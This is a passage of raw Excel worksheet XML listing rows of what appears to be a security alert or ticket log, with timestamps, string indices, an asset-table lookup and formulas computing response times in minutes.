      <c r="BD25" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A26" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B26" s="2">
        <v>45883.6647453704</v>
      </c>
      <c r="C26" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D26" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E26" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F26" s="10" t="s">
        <v>11575</v>
      </c>
      <c r="G26" s="10"/>
      <c r="H26" s="10"/>
      <c r="I26" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J26" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K26" s="10"/>
      <c r="L26" s="10"/>
      <c r="M26" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N26" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O26" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P26" s="10"/>
      <c r="Q26" s="10"/>
      <c r="R26" s="10"/>
      <c r="S26" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T26" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U26" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V26" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W26" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X26" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y26" s="10" t="s">
        <v>11448</v>
      </c>
      <c r="Z26" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA26" s="10"/>
      <c r="AB26" s="10"/>
      <c r="AC26" s="14">
        <v>45883.6647569444</v>
      </c>
      <c r="AD26" s="14">
        <v>45883.6621180556</v>
      </c>
      <c r="AE26" s="14"/>
      <c r="AF26" s="14"/>
      <c r="AG26" s="14"/>
      <c r="AH26" s="10"/>
      <c r="AI26" s="10"/>
      <c r="AJ26" s="10"/>
      <c r="AK26" s="10"/>
      <c r="AL26" s="10"/>
      <c r="AM26" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN26" s="10"/>
      <c r="AO26" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP26" s="10"/>
      <c r="AQ26" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR26" s="10"/>
      <c r="AS26" s="10"/>
      <c r="AT26" s="10"/>
      <c r="AU26" s="10"/>
      <c r="AV26" s="10"/>
      <c r="AW26" s="10"/>
      <c r="AX26" s="14"/>
      <c r="AY26" s="1" t="e">
        <f>VLOOKUP(E26,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ26" s="9">
        <f t="shared" si="0"/>
        <v>3.78</v>
      </c>
      <c r="BA26" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB26" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC26" s="9">
        <f t="shared" si="3"/>
        <v>0.02</v>
      </c>
      <c r="BD26" s="9">
        <f t="shared" si="4"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="27" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A27" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B27" s="2">
        <v>45906.3144675926</v>
      </c>
      <c r="C27" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D27" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E27" s="10" t="s">
        <v>2715</v>
      </c>
      <c r="F27" s="10" t="s">
        <v>11616</v>
      </c>
      <c r="G27" s="10"/>
      <c r="H27" s="10"/>
      <c r="I27" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J27" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K27" s="10"/>
      <c r="L27" s="10"/>
      <c r="M27" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N27" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O27" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P27" s="10"/>
      <c r="Q27" s="10"/>
      <c r="R27" s="10"/>
      <c r="S27" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T27" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U27" s="10" t="s">
        <v>11379</v>
      </c>
      <c r="V27" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W27" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X27" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y27" s="10" t="s">
        <v>11439</v>
      </c>
      <c r="Z27" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA27" s="10"/>
      <c r="AB27" s="10"/>
      <c r="AC27" s="14">
        <v>45906.3144675926</v>
      </c>
      <c r="AD27" s="14">
        <v>45905.9658912037</v>
      </c>
      <c r="AE27" s="14"/>
      <c r="AF27" s="14"/>
      <c r="AG27" s="14"/>
      <c r="AH27" s="10"/>
      <c r="AI27" s="10"/>
      <c r="AJ27" s="10"/>
      <c r="AK27" s="10"/>
      <c r="AL27" s="10"/>
      <c r="AM27" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN27" s="10"/>
      <c r="AO27" s="10" t="s">
        <v>11379</v>
      </c>
      <c r="AP27" s="10"/>
      <c r="AQ27" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR27" s="14"/>
      <c r="AS27" s="10"/>
      <c r="AT27" s="10"/>
      <c r="AU27" s="10"/>
      <c r="AV27" s="10"/>
      <c r="AW27" s="10"/>
      <c r="AX27" s="10"/>
      <c r="AY27" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ27" s="9">
        <f t="shared" si="0"/>
        <v>501.95</v>
      </c>
      <c r="BA27" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB27" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC27" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BD27" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A28" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B28" s="2">
        <v>45906.314537037</v>
      </c>
      <c r="C28" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D28" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E28" s="10" t="s">
        <v>603</v>
      </c>
      <c r="F28" s="10" t="s">
        <v>11617</v>
      </c>
      <c r="G28" s="10"/>
      <c r="H28" s="10"/>
      <c r="I28" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J28" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K28" s="10"/>
      <c r="L28" s="10"/>
      <c r="M28" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N28" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O28" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P28" s="10"/>
      <c r="Q28" s="10"/>
      <c r="R28" s="10"/>
      <c r="S28" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T28" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U28" s="10" t="s">
        <v>8777</v>
      </c>
      <c r="V28" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W28" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X28" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y28" s="10" t="s">
        <v>11434</v>
      </c>
      <c r="Z28" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA28" s="10"/>
      <c r="AB28" s="10"/>
      <c r="AC28" s="14">
        <v>45906.314537037</v>
      </c>
      <c r="AD28" s="14">
        <v>45905.9659375</v>
      </c>
      <c r="AE28" s="14"/>
      <c r="AF28" s="14"/>
      <c r="AG28" s="14"/>
      <c r="AH28" s="10"/>
      <c r="AI28" s="10"/>
      <c r="AJ28" s="10"/>
      <c r="AK28" s="10"/>
      <c r="AL28" s="10"/>
      <c r="AM28" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN28" s="10"/>
      <c r="AO28" s="10" t="s">
        <v>8777</v>
      </c>
      <c r="AP28" s="10"/>
      <c r="AQ28" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR28" s="14"/>
      <c r="AS28" s="10"/>
      <c r="AT28" s="10"/>
      <c r="AU28" s="10"/>
      <c r="AV28" s="10"/>
      <c r="AW28" s="10"/>
      <c r="AX28" s="14"/>
      <c r="AY28" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ28" s="9">
        <f t="shared" si="0"/>
        <v>501.98</v>
      </c>
      <c r="BA28" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB28" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC28" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BD28" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="29" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A29" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B29" s="2">
        <v>45906.3145833333</v>
      </c>
      <c r="C29" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D29" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E29" s="10" t="s">
        <v>3620</v>
      </c>
      <c r="F29" s="10" t="s">
        <v>11618</v>
      </c>
      <c r="G29" s="10"/>
      <c r="H29" s="10"/>
      <c r="I29" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J29" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K29" s="10"/>
      <c r="L29" s="10"/>
      <c r="M29" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N29" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O29" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P29" s="10"/>
      <c r="Q29" s="10"/>
      <c r="R29" s="10"/>
      <c r="S29" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T29" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U29" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="V29" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W29" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X29" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y29" s="10" t="s">
        <v>11442</v>
      </c>
      <c r="Z29" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA29" s="10"/>
      <c r="AB29" s="10"/>
      <c r="AC29" s="14">
        <v>45906.3145833333</v>
      </c>
      <c r="AD29" s="14">
        <v>45905.965787037</v>
      </c>
      <c r="AE29" s="14"/>
      <c r="AF29" s="14"/>
      <c r="AG29" s="14"/>
      <c r="AH29" s="10"/>
      <c r="AI29" s="10"/>
      <c r="AJ29" s="10"/>
      <c r="AK29" s="10"/>
      <c r="AL29" s="10"/>
      <c r="AM29" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN29" s="10"/>
      <c r="AO29" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP29" s="10"/>
      <c r="AQ29" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR29" s="10"/>
      <c r="AS29" s="10"/>
      <c r="AT29" s="10"/>
      <c r="AU29" s="10"/>
      <c r="AV29" s="10"/>
      <c r="AW29" s="10"/>
      <c r="AX29" s="14"/>
      <c r="AY29" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ29" s="9">
        <f t="shared" si="0"/>
        <v>502.27</v>
      </c>
      <c r="BA29" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB29" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC29" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BD29" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A30" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B30" s="2">
        <v>45906.3145949074</v>
      </c>
      <c r="C30" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E30" s="10" t="s">
        <v>1693</v>
      </c>
      <c r="F30" s="10" t="s">
        <v>11619</v>
      </c>
      <c r="G30" s="10"/>
      <c r="H30" s="10"/>
      <c r="I30" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J30" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K30" s="10"/>
      <c r="L30" s="10"/>
      <c r="M30" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N30" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O30" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P30" s="10"/>
      <c r="Q30" s="10"/>
      <c r="R30" s="10"/>
      <c r="S30" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T30" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U30" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="V30" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W30" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X30" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y30" s="10" t="s">
        <v>11437</v>
      </c>
      <c r="Z30" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA30" s="10"/>
      <c r="AB30" s="10"/>
      <c r="AC30" s="14">
        <v>45906.3146064815</v>
      </c>
      <c r="AD30" s="14">
        <v>45905.9659027778</v>
      </c>
      <c r="AE30" s="14"/>
      <c r="AF30" s="14"/>
      <c r="AG30" s="14"/>
      <c r="AH30" s="10"/>
      <c r="AI30" s="10"/>
      <c r="AJ30" s="10"/>
      <c r="AK30" s="10"/>
      <c r="AL30" s="10"/>
      <c r="AM30" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN30" s="10"/>
      <c r="AO30" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="AP30" s="10"/>
      <c r="AQ30" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR30" s="10"/>
      <c r="AS30" s="10"/>
      <c r="AT30" s="10"/>
      <c r="AU30" s="10"/>
      <c r="AV30" s="10"/>
      <c r="AW30" s="10"/>
      <c r="AX30" s="10"/>
      <c r="AY30" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ30" s="9">
        <f t="shared" si="0"/>
        <v>502.12</v>
      </c>
      <c r="BA30" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB30" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC30" s="9">
        <f t="shared" si="3"/>
        <v>0.02</v>
      </c>
      <c r="BD30" s="9">
        <f t="shared" si="4"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="31" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A31" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B31" s="2">
        <v>45906.3146296296</v>
      </c>
      <c r="C31" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D31" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E31" s="10" t="s">
        <v>422</v>
      </c>
      <c r="F31" s="10" t="s">
        <v>11620</v>
      </c>
      <c r="G31" s="10"/>
      <c r="H31" s="10"/>
      <c r="I31" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J31" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K31" s="10"/>
      <c r="L31" s="10"/>
      <c r="M31" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N31" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O31" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P31" s="10"/>
      <c r="Q31" s="10"/>
      <c r="R31" s="10"/>
      <c r="S31" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T31" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U31" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="V31" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W31" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X31" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y31" s="10" t="s">
        <v>11431</v>
      </c>
      <c r="Z31" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA31" s="10"/>
      <c r="AB31" s="10"/>
      <c r="AC31" s="14">
        <v>45906.3146296296</v>
      </c>
      <c r="AD31" s="14">
        <v>45905.9659490741</v>
      </c>
      <c r="AE31" s="14"/>
      <c r="AF31" s="14"/>
      <c r="AG31" s="14"/>
      <c r="AH31" s="10"/>
      <c r="AI31" s="10"/>
      <c r="AJ31" s="10"/>
      <c r="AK31" s="10"/>
      <c r="AL31" s="10"/>
      <c r="AM31" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN31" s="10"/>
      <c r="AO31" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="AP31" s="10"/>
      <c r="AQ31" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR31" s="14"/>
      <c r="AS31" s="10"/>
      <c r="AT31" s="10"/>
      <c r="AU31" s="10"/>
      <c r="AV31" s="10"/>
      <c r="AW31" s="10"/>
      <c r="AX31" s="14"/>
      <c r="AY31" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ31" s="9">
        <f t="shared" si="0"/>
        <v>502.1</v>
      </c>
      <c r="BA31" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB31" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC31" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BD31" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A32" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B32" s="2">
        <v>45911.0203703704</v>
      </c>
      <c r="C32" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D32" s="10" t="s">
        <v>10543</v>
      </c>
      <c r="E32" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F32" s="10" t="s">
        <v>11567</v>
      </c>
      <c r="G32" s="10"/>
      <c r="H32" s="10"/>
      <c r="I32" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J32" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K32" s="10"/>
      <c r="L32" s="10"/>
      <c r="M32" s="10" t="s">
        <v>11569</v>
      </c>
      <c r="N32" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O32" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P32" s="10"/>
      <c r="Q32" s="10"/>
      <c r="R32" s="10"/>
      <c r="S32" s="10" t="s">
        <v>8710</v>
      </c>
      <c r="T32" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U32" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V32" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W32" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X32" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y32" s="10" t="s">
        <v>11410</v>
      </c>
      <c r="Z32" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA32" s="10"/>
      <c r="AB32" s="10"/>
      <c r="AC32" s="14">
        <v>45911.0203819444</v>
      </c>
      <c r="AD32" s="14">
        <v>45911.0179861111</v>
      </c>
      <c r="AE32" s="14"/>
      <c r="AF32" s="14"/>
      <c r="AG32" s="14"/>
      <c r="AH32" s="10"/>
      <c r="AI32" s="10"/>
      <c r="AJ32" s="10"/>
      <c r="AK32" s="10"/>
      <c r="AL32" s="10"/>
      <c r="AM32" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN32" s="10"/>
      <c r="AO32" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP32" s="10"/>
      <c r="AQ32" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR32" s="14"/>
      <c r="AS32" s="10"/>
      <c r="AT32" s="10"/>
      <c r="AU32" s="10"/>
      <c r="AV32" s="10"/>
      <c r="AW32" s="10"/>
      <c r="AX32" s="10"/>
      <c r="AY32" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ32" s="9">
        <f t="shared" si="0"/>
        <v>3.43</v>
      </c>
      <c r="BA32" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB32" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC32" s="9">
        <f t="shared" si="3"/>
        <v>0.02</v>
      </c>
      <c r="BD32" s="9">
        <f t="shared" si="4"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="33" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A33" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B33" s="2">
        <v>45912.9845833333</v>
      </c>
      <c r="C33" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D33" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E33" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F33" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G33" s="10"/>
      <c r="H33" s="10"/>
      <c r="I33" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J33" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K33" s="10"/>
      <c r="L33" s="10"/>
      <c r="M33" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N33" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O33" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P33" s="10"/>
      <c r="Q33" s="10"/>
      <c r="R33" s="10"/>
      <c r="S33" s="10" t="s">
        <v>8710</v>
      </c>
      <c r="T33" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U33" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V33" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W33" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X33" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y33" s="10" t="s">
        <v>11408</v>
      </c>
      <c r="Z33" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA33" s="10"/>
      <c r="AB33" s="10"/>
      <c r="AC33" s="14">
        <v>45912.9846412037</v>
      </c>
      <c r="AD33" s="14">
        <v>45912.9821990741</v>
      </c>
      <c r="AE33" s="14"/>
      <c r="AF33" s="14"/>
      <c r="AG33" s="14"/>
      <c r="AH33" s="10"/>
      <c r="AI33" s="10"/>
      <c r="AJ33" s="10"/>
      <c r="AK33" s="10"/>
      <c r="AL33" s="10"/>
      <c r="AM33" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN33" s="10"/>
      <c r="AO33" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP33" s="10"/>
      <c r="AQ33" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR33" s="14"/>
      <c r="AS33" s="10"/>
      <c r="AT33" s="10"/>
      <c r="AU33" s="10"/>
      <c r="AV33" s="10"/>
      <c r="AW33" s="10"/>
      <c r="AX33" s="10"/>
      <c r="AY33" s="1" t="e">
        <f>VLOOKUP(E33,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ33" s="9">
        <f t="shared" si="0"/>
        <v>3.43</v>
      </c>
      <c r="BA33" s="9">
        <f t="shared" si="5"/>
        <v>0.08</v>
      </c>
      <c r="BB33" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC33" s="9">
        <f t="shared" si="3"/>
        <v>0.08</v>
      </c>
      <c r="BD33" s="9">
        <f t="shared" si="4"/>
        <v>0.08</v>
      </c>
    </row>
    <row r="34" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A34" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B34" s="2">
        <v>45912.9890972222</v>
      </c>
      <c r="C34" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D34" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E34" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F34" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G34" s="10"/>
      <c r="H34" s="10"/>
      <c r="I34" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J34" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K34" s="10"/>
      <c r="L34" s="10"/>
      <c r="M34" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N34" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O34" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P34" s="10"/>
      <c r="Q34" s="10"/>
      <c r="R34" s="10"/>
      <c r="S34" s="10" t="s">
        <v>8710</v>
      </c>
      <c r="T34" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U34" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V34" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W34" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X34" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y34" s="10" t="s">
        <v>11406</v>
      </c>
      <c r="Z34" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA34" s="10"/>
      <c r="AB34" s="10"/>
      <c r="AC34" s="14">
        <v>45912.9895717593</v>
      </c>
      <c r="AD34" s="14">
        <v>45912.9855671296</v>
      </c>
      <c r="AE34" s="14"/>
      <c r="AF34" s="14"/>
      <c r="AG34" s="14"/>
      <c r="AH34" s="10"/>
      <c r="AI34" s="10"/>
      <c r="AJ34" s="10"/>
      <c r="AK34" s="10"/>
      <c r="AL34" s="10"/>
      <c r="AM34" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN34" s="10"/>
      <c r="AO34" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP34" s="10"/>
      <c r="AQ34" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR34" s="10"/>
      <c r="AS34" s="10"/>
      <c r="AT34" s="10"/>
      <c r="AU34" s="10"/>
      <c r="AV34" s="10"/>
      <c r="AW34" s="10"/>
      <c r="AX34" s="10"/>
      <c r="AY34" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ34" s="9">
        <f t="shared" si="0"/>
        <v>5.08</v>
      </c>
      <c r="BA34" s="9">
        <f t="shared" si="5"/>
        <v>0.68</v>
      </c>
      <c r="BB34" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC34" s="9">
        <f t="shared" si="3"/>
        <v>0.68</v>
      </c>
      <c r="BD34" s="9">
        <f t="shared" si="4"/>
        <v>0.68</v>
      </c>
    </row>
    <row r="35" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A35" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B35" s="2">
        <v>45915.3318865741</v>
      </c>
      <c r="C35" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D35" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E35" s="10" t="s">
        <v>2715</v>
      </c>
      <c r="F35" s="10" t="s">
        <v>11616</v>
      </c>
      <c r="G35" s="10"/>
      <c r="H35" s="10"/>
      <c r="I35" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J35" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K35" s="10"/>
      <c r="L35" s="10"/>
      <c r="M35" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N35" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O35" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P35" s="10"/>
      <c r="Q35" s="10"/>
      <c r="R35" s="10"/>
      <c r="S35" s="10" t="s">
        <v>8663</v>
      </c>
      <c r="T35" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U35" s="10" t="s">
        <v>11379</v>
      </c>
      <c r="V35" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W35" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X35" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y35" s="10" t="s">
        <v>11378</v>
      </c>
      <c r="Z35" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA35" s="10"/>
      <c r="AB35" s="10"/>
      <c r="AC35" s="14">
        <v>45915.3318981481</v>
      </c>
      <c r="AD35" s="14">
        <v>45914.9831944444</v>
      </c>
      <c r="AE35" s="14"/>
      <c r="AF35" s="14"/>
      <c r="AG35" s="14"/>
      <c r="AH35" s="10"/>
      <c r="AI35" s="10"/>
      <c r="AJ35" s="10"/>
      <c r="AK35" s="10"/>
      <c r="AL35" s="10"/>
      <c r="AM35" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN35" s="10"/>
      <c r="AO35" s="10" t="s">
        <v>11379</v>
      </c>
      <c r="AP35" s="10"/>
      <c r="AQ35" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR35" s="10"/>
      <c r="AS35" s="10"/>
      <c r="AT35" s="10"/>
      <c r="AU35" s="10"/>
      <c r="AV35" s="10"/>
      <c r="AW35" s="10"/>
      <c r="AX35" s="10"/>
      <c r="AY35" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ35" s="9">
        <f t="shared" ref="AZ35:AZ66" si="6">IF(A35&lt;&gt;"最新威胁",ROUND((B35-AD35)*24*60,2),"")</f>
        <v>502.12</v>
      </c>
      <c r="BA35" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB35" s="9" t="str">
        <f t="shared" ref="BB35:BB66" si="7">IF(A35&lt;&gt;"最新威胁",IF(ISBLANK(AX35),"",ROUND((AX35-B35)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BC35" s="9">
